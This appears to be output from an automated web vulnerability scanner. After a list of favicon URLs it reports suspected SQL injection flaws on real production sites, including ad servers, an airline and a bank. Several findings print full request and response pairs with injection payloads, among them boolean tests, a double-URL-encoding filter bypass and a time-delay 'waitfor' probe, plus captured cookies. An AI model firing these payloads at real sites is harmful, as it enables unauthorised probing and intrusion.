27.92. http://www.gamewinners.com/favicon.ico

27.93. http://www.gardenweb.com/favicon.ico

27.94. http://www.genealogy.com/favicon.ico

27.95. http://www.gossipcenter.com/favicon.ico

27.96. http://www.gourmandia.com/favicon.ico

27.97. http://www.greenwichmeantime.com/favicon.ico

27.98. http://www.harvard.edu/favicon.ico

27.99. http://www.hiexpress.com/favicon.ico

27.100. http://www.holidayinn.com/favicon.ico

27.101. http://www.hollywoodreporter.com/favicon.ico

27.102. http://www.home-remedies-for-you.com/favicon.ico

27.103. http://www.ichotelsgroup.com/favicon.ico

27.104. http://www.imagevenue.com/favicon.ico

27.105. http://www.inc.com/favicon.ico

27.106. http://www.infomash.org/favicon.ico

27.107. http://www.infowars.com/favicon.ico

27.108. http://www.ivillage.com/favicon.ico

27.109. http://www.jango.com/favicon.ico

27.110. http://www.jcwhitney.com/favicon.ico

27.111. http://www.joann.com/favicon.ico

27.112. http://www.jobsonline.net/favicon.ico

27.113. http://www.justia.com/favicon.ico

27.114. http://www.justluxe.com/favicon.ico

27.115. http://www.k12.com/favicon.ico

27.116. http://www.kazaa.com/favicon.ico

27.117. http://www.kcom.com/favicon.ico

27.118. http://www.kcom.com/favicon1.ico

27.119. http://www.kickapps.com/favicon.ico

27.120. http://www.lijit.com/favicon.ico

27.121. http://www.livevideo.com/favicon.ico

27.122. http://www.localpages.com/favicon.ico

27.123. http://www.localschooldirectory.com/favicon.ico

27.124. http://www.lowfares.com/favicon.ico

27.125. http://www.lunka.com/favicon.ico

27.126. http://www.mac.com/favicon.ico

27.127. http://www.maniatv.com/favicon.ico

27.128. http://www.mediaite.com/favicon.ico

27.129. http://www.medicalnewstoday.com/favicon.ico

27.130. http://www.mercurynews.com/favicon.ico

27.131. http://www.michigan.gov/favicon.ico

27.132. http://www.military.com/favicon.ico

27.133. http://www.miniclip.com/favicon.ico

27.134. http://www.mlive.com/favicon.ico

27.135. http://www.mochila.com/favicon.ico

27.136. http://www.music-oasis.com/favicon.ico

27.137. http://www.musiciansfriend.com/favicon.ico

27.138. http://www.myheritage.com/favicon.ico

27.139. http://www.mylifetime.com/favicon.ico

27.140. http://www.mylocalemployment.net/favicon.ico

27.141. http://www.mystart.com/favicon.ico

27.142. http://www.nationalreview.com/favicon.ico

27.143. http://www.netflix.com/favicon.ico

27.144. http://www.newgrounds.com/favicon.ico

27.145. http://www.newsdaily7.com/favicon.ico

27.146. http://www.newsok.com/favicon.ico

27.147. http://www.nextag.com/favicon.ico

27.148. http://www.northerntool.com/favicon.ico

27.149. http://www.oodle.com/favicon.ico

27.150. http://www.opportunity.co/favicon.ico

27.151. http://www.oprah.com/favicon.ico

27.152. http://www.orientaltrading.com/favicon.ico

27.153. http://www.ourstage.com/favicon.ico

27.154. http://www.ovguide.com/favicon.ico

27.155. http://www.partypoker.com/favicon.ico

27.156. http://www.payless.com/favicon.ico

27.157. http://www.pctools.com/favicon.ico

27.158. http://www.phoenix.edu/favicon.ico

27.159. http://www.phoneagentsource.com/favicon.ico

27.160. http://www.pittsburghlive.com/favicon.ico

27.161. http://www.playfin.com/favicon.ico

27.162. http://www.playstation.com/favicon.ico

27.163. http://www.playsushi.com/favicon.ico

27.164. http://www.politico.com/favicon.ico

27.165. http://www.polyvore.com/favicon.ico

27.166. http://www.popsugar.com/favicon.ico

27.167. http://www.poptropica.com/favicon.ico

27.168. http://www.potterybarn.com/favicon.ico

27.169. http://www.prlog.org/favicon.ico

27.170. http://www.pronto.com/favicon.ico

27.171. http://www.qualityhealth.com/favicon.ico

27.172. http://www.radaronline.com/favicon.ico

27.173. http://www.rawtube.com/favicon.ico

27.174. http://www.real.com/favicon.ico

27.175. http://www.rei.com/favicon.ico

27.176. http://www.rollingstone.com/favicon.ico

27.177. http://www.rottentomatoes.com/favicon.ico

27.178. http://www.rushlimbaugh.com/favicon.ico

27.179. http://www.salon.com/favicon.ico

27.180. http://www.samsung.com/favicon.ico

27.181. http://www.shutterfly.com/favicon.ico

27.182. http://www.smarter.com/favicon.ico

27.183. http://www.smugmug.com/favicon.ico

27.184. http://www.songlyrics.com/favicon.ico

27.185. http://www.sony.com/favicon.ico

27.186. http://www.space.com/favicon.ico

27.187. http://www.spanishdict.com/favicon.ico

27.188. http://www.squidoo.com/favicon.ico

27.189. http://www.staples.com/favicon.ico

27.190. http://www.suite101.com/favicon.ico

27.191. http://www.supercheats.com/favicon.ico

27.192. http://www.tagged.com/favicon.ico

27.193. http://www.takkle.com/favicon.ico

27.194. http://www.talkingpointsmemo.com/favicon.ico

27.195. http://www.techsupportforum.com/favicon.ico

27.196. http://www.thedailybeast.com/favicon.ico

27.197. http://www.thefrisky.com/favicon.ico

27.198. http://www.tinypic.com/favicon.ico

27.199. http://www.tomshardware.com/favicon.ico

27.200. http://www.toptenreviews.com/favicon.ico

27.201. http://www.trulia.com/favicon.ico

27.202. http://www.twitlonger.com/favicon.ico

27.203. http://www.umn.edu/favicon.ico

27.204. http://www.ups.com/favicon.ico

27.205. http://www.urbandictionary.com/favicon.ico

27.206. http://www.vast.com/favicon.ico

27.207. http://www.verisign.com/favicon.ico

27.208. http://www.vitals.com/favicon.ico

27.209. http://www.weather.gov/favicon.ico

27.210. http://www.webgains.com/favicon.ico

27.211. http://www.webkinz.com/favicon.ico

27.212. http://www.webring.org/favicon.ico

27.213. http://www.wired.com/favicon.ico

27.214. http://www.wnd.com/favicon.ico

27.215. http://www.woot.com/favicon.ico

27.216. http://www.worldwinner.com/favicon.ico

27.217. http://www.worthpoint.com/favicon.ico

27.218. http://www.wsbtv.com/favicon.ico

27.219. http://www.xomba.com/favicon.ico

27.220. http://www.yfrog.com/favicon.ico

27.221. http://www.yidio.com/favicon.ico

27.222. http://www.yourfilehost.com/favicon.ico

27.223. http://www.yuku.com/favicon.ico

27.224. http://www.zabasearch.com/favicon.ico

27.225. http://www.zmags.com/favicon.ico

28. Content type is not specified

28.1. http://www.4shared.com/favicon.ico

28.2. http://www.6pm.com/favicon.ico

28.3. http://www.bizrate.com/favicon.ico

28.4. http://www.blockbuster.com/favicon.ico

28.5. http://www.boldchat.com/favicon.ico

28.6. http://www.bookrags.com/favicon.ico

28.7. http://www.chacha.com/favicon.ico

28.8. http://www.dailymail.co.uk/favicon.ico

28.9. http://www.dominos.com/favicon.ico

28.10. http://www.gap.com/favicon.ico

28.11. http://www.hi5.com/favicon.ico

28.12. http://www.hotwire.com/favicon.ico

28.13. http://www.instructables.com/favicon.ico

28.14. http://www.jstor.org/favicon.ico

28.15. http://www.medcohealth.com/favicon.ico

28.16. http://www.mynewplace.com/favicon.ico

28.17. http://www.officedepot.com/favicon.ico

28.18. http://www.outbrain.com/favicon.ico

28.19. http://www.pogo.com/favicon.ico

28.20. http://www.retrevo.com/favicon.ico

28.21. http://www.rightathome.com/favicon.ico

28.22. http://www.savings.com/favicon.ico

28.23. http://www.shopzilla.com/favicon.ico

28.24. http://www.techbargains.com/favicon.ico

28.25. http://www.tracfone.com/favicon.ico

28.26. http://www.va.gov/favicon.ico

28.27. http://www.webs.com/favicon.ico

28.28. http://www.zappos.com/favicon.ico

29. SSL certificate


1. SQL injection  next
There are 12 instances of this issue:

1.1. http://ad.doubleclick.net/adi/N1260.Google.com/B5219922.27 [adurl parameter]  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ad.doubleclick.net
Path:   /adi/N1260.Google.com/B5219922.27

Issue detail

The adurl parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the adurl parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /adi/N1260.Google.com/B5219922.27;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BiFx0Dh2XTaX3Ic7ilQf6iqHVCPux5J4C25fY3hvAjbcB4JuQAhABGAEgvs7lDTgAUJT5_pcHYMkGoAHN19niA7IBBnhzcy5jeLoBCTcyOHg5MF9hc8gBCdoBUGh0dHA6Ly94c3MuY3gvZXhhbXBsZXMvaHRtbC9jYXBlYy04Ni1kb3JrLXhzcy1jcm9zcy1zaXRlLXNjcmlwdGluZy1leGFtcGxlcy5odG1suAIYyAKzq8AcqAMB0QNb5as_VmQv-OgDigPoAx_oAwX1AwAAAMQ&num=1&sig=AGiWqtxII5ILhYzUahUeLNR8TnlD6RZSPQ&client=ca-pub-4063878933780912&adurl=;ord=879784873?'%20and%201%3d1--%20 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1300998819&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2Fexamples%2Fhtml%2Fcapec-86-dork-xss-cross-site-scripting-examples.html&dt=1301749042824&bpp=3&shv=r20110324&jsv=r20110321-2&correlator=1301749042836&frm=0&adk=1607234649&ga_vid=1243467471.1301749043&ga_sid=1301749043&ga_hid=1328169759&ga_fc=0&u_tz=-300&u_his=21&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=998&bih=1004&fu=0&ifi=1&dtd=16&xpc=E2Nhb6Q087&p=http%3A//xss.cx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|2305757/776973/15064,998766/320821/15055,1831140/746237/15055,2818894/957634/15036|t=1297805141|et=730|cs=v3vpvykb

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 02 Apr 2011 13:00:36 GMT
Vary: Accept-Encoding
Expires: Sat, 02 Apr 2011 13:00:36 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7132

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
<!-- Code auto-generated on Thu Jan 06 11:17:22 EST 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
<SCRIPT LANGUAGE="JavaScript">
<!--
function DCFlash(id,pVM){
var swf = "http://s0.2mdn.net/2830766/cisco_webex_Together_AllText_728x90_r1.swf";
var gif = "http://s0.2mdn.net/2830766/cisco_webex_Hard-hit_AllText_728x90_r1.gif";
var minV = 8;
var FWH = ' width="728" height="90" ';
var url = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3add/f/19b/%2a/c%3B235704433%3B0-0%3B0%3B59487875%3B3454-728/90%3B40121456/40139243/1%3B%3B%7Esscs%3D%3fhttp://googleads.g.doubleclick.net/aclk?sa=l&ai=BiFx0Dh2XTaX3Ic7ilQf6iqHVCPux5J4C25fY3hvAjbcB4JuQAhABGAEgvs7lDTgAUJT5_pcHYMkGoAHN19niA7IBBnhzcy5jeLoBCTcyOHg5MF9hc8gBCdoBUGh0dHA6Ly94c3MuY3gvZXhhbXBsZXMvaHRtbC9jYXBlYy04Ni1kb3JrLXhzcy1jcm9zcy1zaXRlLXNjcmlwdGluZy1leGFtcGxlcy5odG1suAIYyAKzq8AcqAMB0QNb5as_VmQv-OgDigPoAx_oAwX1AwAAAMQ&num=1&sig=AGiWqtxII5ILhYzUahUeLNR8TnlD6RZSPQ&client=ca-pub-4063878933780912&adurl=http%3a%2f%2fwww.webex.com/lpintl/us/banner/lets-get-together.html%3FTrackID%3D1024433");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow = "false";
var winW = 0;
var winH = 0;
var winL = 0;
var winT = 0;

var moviePath=swf.substring(0,swf.lastIndexOf("/"));
var sm=new Array();


var defaultCtVal = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3add/f/19b/%2a/c%3B235704433%3B0-0%3B0%3B59487875%3B3454-728/90%3B40121456/40139243/1%3B%3B%7Esscs%3D%3fhttp://googleads.g.doubleclick.net/aclk?sa=l&ai=BiFx0Dh2XTaX3Ic7ilQf6iqHVCPux5J4C25fY3hvAjbcB4JuQAhABGAEgvs7lDTgAUJT5_pcHYMkGoAHN19niA7IBBnhzcy5jeLoBCTcyOHg5MF9hc8gBCdoBUGh0dHA6Ly94c3MuY3gvZXhhbXBsZXMvaHRtbC9jYXBlYy04Ni1kb3JrLXhzcy1jcm9zcy1zaXRlLXNjcmlwdGluZy1leGFtcGxlcy5odG1suAIYyAKzq8AcqAMB0QNb5as_VmQv-OgDigPoAx_oAwX1AwAAAMQ&num=1&sig=AGiWqtxII5ILhYzUahUeLNR8TnlD6RZSPQ&client=ca-pub-4063878933780912&adurl=http%3a%2f%2fwww.webex.com/lpintl/us/banner/lets-get-together.html%3FTrac
...[SNIP]...

Request 2

GET /adi/N1260.Google.com/B5219922.27;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BiFx0Dh2XTaX3Ic7ilQf6iqHVCPux5J4C25fY3hvAjbcB4JuQAhABGAEgvs7lDTgAUJT5_pcHYMkGoAHN19niA7IBBnhzcy5jeLoBCTcyOHg5MF9hc8gBCdoBUGh0dHA6Ly94c3MuY3gvZXhhbXBsZXMvaHRtbC9jYXBlYy04Ni1kb3JrLXhzcy1jcm9zcy1zaXRlLXNjcmlwdGluZy1leGFtcGxlcy5odG1suAIYyAKzq8AcqAMB0QNb5as_VmQv-OgDigPoAx_oAwX1AwAAAMQ&num=1&sig=AGiWqtxII5ILhYzUahUeLNR8TnlD6RZSPQ&client=ca-pub-4063878933780912&adurl=;ord=879784873?'%20and%201%3d2--%20 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1300998819&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2Fexamples%2Fhtml%2Fcapec-86-dork-xss-cross-site-scripting-examples.html&dt=1301749042824&bpp=3&shv=r20110324&jsv=r20110321-2&correlator=1301749042836&frm=0&adk=1607234649&ga_vid=1243467471.1301749043&ga_sid=1301749043&ga_hid=1328169759&ga_fc=0&u_tz=-300&u_his=21&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=998&bih=1004&fu=0&ifi=1&dtd=16&xpc=E2Nhb6Q087&p=http%3A//xss.cx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|2305757/776973/15064,998766/320821/15055,1831140/746237/15055,2818894/957634/15036|t=1297805141|et=730|cs=v3vpvykb

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 02 Apr 2011 13:00:37 GMT
Vary: Accept-Encoding
Expires: Sat, 02 Apr 2011 13:00:37 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7144

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
<!-- Code auto-generated on Mon Jan 31 10:15:05 EST 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
<SCRIPT LANGUAGE="JavaScript">
<!--
function DCFlash(id,pVM){
var swf = "http://s0.2mdn.net/2830766/Cisco_WebEx_FacetoFace_HQ_Banner_728x90.swf";
var gif = "http://s0.2mdn.net/2830766/Cisco_WebEx_FacetoFace_HQ_Banner_728x90.gif";
var minV = 8;
var FWH = ' width="728" height="90" ';
var url = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3add/f/19b/%2a/f%3B236250338%3B0-0%3B0%3B59487875%3B3454-728/90%3B40497957/40515744/1%3B%3B%7Esscs%3D%3fhttp://googleads.g.doubleclick.net/aclk?sa=l&ai=BiFx0Dh2XTaX3Ic7ilQf6iqHVCPux5J4C25fY3hvAjbcB4JuQAhABGAEgvs7lDTgAUJT5_pcHYMkGoAHN19niA7IBBnhzcy5jeLoBCTcyOHg5MF9hc8gBCdoBUGh0dHA6Ly94c3MuY3gvZXhhbXBsZXMvaHRtbC9jYXBlYy04Ni1kb3JrLXhzcy1jcm9zcy1zaXRlLXNjcmlwdGluZy1leGFtcGxlcy5odG1suAIYyAKzq8AcqAMB0QNb5as_VmQv-OgDigPoAx_oAwX1AwAAAMQ&num=1&sig=AGiWqtxII5ILhYzUahUeLNR8TnlD6RZSPQ&client=ca-pub-4063878933780912&adurl=http%3a%2f%2fwww.webex.com/lpintl/us/banner/next-meeting-hqvideo.html%3FTrackID%3D1024051");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow = "false";
var winW = 0;
var winH = 0;
var winL = 0;
var winT = 0;

var moviePath=swf.substring(0,swf.lastIndexOf("/"));
var sm=new Array();


var defaultCtVal = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3add/f/19b/%2a/f%3B236250338%3B0-0%3B0%3B59487875%3B3454-728/90%3B40497957/40515744/1%3B%3B%7Esscs%3D%3fhttp://googleads.g.doubleclick.net/aclk?sa=l&ai=BiFx0Dh2XTaX3Ic7ilQf6iqHVCPux5J4C25fY3hvAjbcB4JuQAhABGAEgvs7lDTgAUJT5_pcHYMkGoAHN19niA7IBBnhzcy5jeLoBCTcyOHg5MF9hc8gBCdoBUGh0dHA6Ly94c3MuY3gvZXhhbXBsZXMvaHRtbC9jYXBlYy04Ni1kb3JrLXhzcy1jcm9zcy1zaXRlLXNjcmlwdGluZy1leGFtcGxlcy5odG1suAIYyAKzq8AcqAMB0QNb5as_VmQv-OgDigPoAx_oAwX1AwAAAMQ&num=1&sig=AGiWqtxII5ILhYzUahUeLNR8TnlD6RZSPQ&client=ca-pub-4063878933780912&adurl=http%3a%2f%2fwww.webex.com/lpintl/us/banner/next-meeting-hqvideo.htm
...[SNIP]...
1.2. http://googleads.g.doubleclick.net/pagead/ads [shv parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The shv parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the shv parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Request 1

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1300998823&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2Fexamples%2Fhtml%2Fcross-site-scripting-xss.www.courchevel.com.html&dt=1301748825197&bpp=5&shv=r20110324%2527&jsv=r20110321-2&correlator=1301748825485&frm=0&adk=1607234649&ga_vid=1342641436.1301748826&ga_sid=1301748826&ga_hid=1862808054&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=982&bih=1004&eid=33895132&fu=0&ifi=1&dtd=324&xpc=XYKSf8Neza&p=http%3A//xss.cx HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; __ar_v4=%7CTEDYGTRZH5DVRIBZAHSESJ%3A20110318%3A1%7CGUKQZOPGUBBXJAG5MGCY3C%3A20110318%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110318%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110318%3A1; id=c708f553300004b|2305757/776973/15064,998766/320821/15055,1831140/746237/15055,2818894/957634/15036|t=1297805141|et=730|cs=v3vpvykb

Response 1

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 02 Apr 2011 13:04:58 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 12326

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
G1sL2Nyb3NzLXNpdGUtc2NyaXB0aW5nLXhzcy53d3cuY291cmNoZXZlbC5jb20uaHRtbKkCbbz1yg4Luz6oAwHIAxfoA6YD6AMf9QMAAADE&num=3&sig=AGiWqtxUeEkInJc9e-CqdzhYewXj-HfsJw&client=ca-pub-4063878933780912&adurl=http://www.exceptionalski.co.uk" id=aw2 onclick="ha('aw2')" onfocus="ss('','aw2')" onmousedown="st('aw2')" onmouseover="return ss('','aw2')" target=_top title="www.exceptionalski.co.uk">
...[SNIP]...

Request 2

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1300998823&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2Fexamples%2Fhtml%2Fcross-site-scripting-xss.www.courchevel.com.html&dt=1301748825197&bpp=5&shv=r20110324%2527%2527&jsv=r20110321-2&correlator=1301748825485&frm=0&adk=1607234649&ga_vid=1342641436.1301748826&ga_sid=1301748826&ga_hid=1862808054&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=982&bih=1004&eid=33895132&fu=0&ifi=1&dtd=324&xpc=XYKSf8Neza&p=http%3A//xss.cx HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; __ar_v4=%7CTEDYGTRZH5DVRIBZAHSESJ%3A20110318%3A1%7CGUKQZOPGUBBXJAG5MGCY3C%3A20110318%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110318%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110318%3A1; id=c708f553300004b|2305757/776973/15064,998766/320821/15055,1831140/746237/15055,2818894/957634/15036|t=1297805141|et=730|cs=v3vpvykb

Response 2

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 02 Apr 2011 13:04:59 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 4641

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(a){window.sta
...[SNIP]...
1.3. http://www.airtran.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.airtran.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /favicon.ico' HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.airtran.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Location: /ErrorHandler/CustomError.aspx?aspxerrorpath=/ErrorHandler/404.aspx
Content-Type: text/html; charset=utf-8
Content-Length: 184
Cache-Control: private, max-age=548
Expires: Sat, 02 Apr 2011 14:12:54 GMT
Date: Sat, 02 Apr 2011 14:03:46 GMT
Connection: close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href='/ErrorHandler/CustomError.aspx?aspxerrorpath=/ErrorHandler/404.aspx'>here</a>.</h2>
</body></html>

Request 2

GET /favicon.ico'' HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.airtran.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Content-Type: text/html; charset=utf-8
Cache-Control: private, max-age=600
Expires: Sat, 02 Apr 2011 14:13:47 GMT
Date: Sat, 02 Apr 2011 14:03:47 GMT
Content-Length: 10394
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="e
...[SNIP]...
1.4. http://www.bbt.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbt.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload 'waitfor%20delay'0%3a0%3a20'-- was submitted in the REST URL parameter 1. The application took 20086 milliseconds to respond to the request, compared with 1023 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Request

GET /favicon.ico'waitfor%20delay'0%3a0%3a20'-- HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bbt.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 - Not Found
content-type: text/html
date: Sat, 02 Apr 2011 13:44:37 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 15424
cache-control: private
x-powered-by: ASP.NET
Set-Cookie: AMWEBJCT!%2Fbbt!ASPSESSIONIDAASQCBAD=GLODNHDACIODPHHEBIKBIABD; Path=/
Set-Cookie: PD_STATEFUL_347ae440-9ca4-11da-83e0-00f81800e002=%2Fbbt; Path=/
Content-Length: 15564


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta name="DCS.dcsuri" content="/404err
...[SNIP]...
1.5. http://www.dealtime.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.dealtime.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /favicon.ico' HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.dealtime.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Set-Cookie: brc=www.dealtime.com; Domain=dealtime.com; Expires=Sun, 03-Apr-2011 13:39:15 GMT; Path=/
Set-Cookie: JSESSIONID=805851EED71FF6143D9FA848ECA7CB9A; Path=/
Set-Cookie: session=ts%3D2%5EPVS%3D1; Domain=.dealtime.com; Path=/
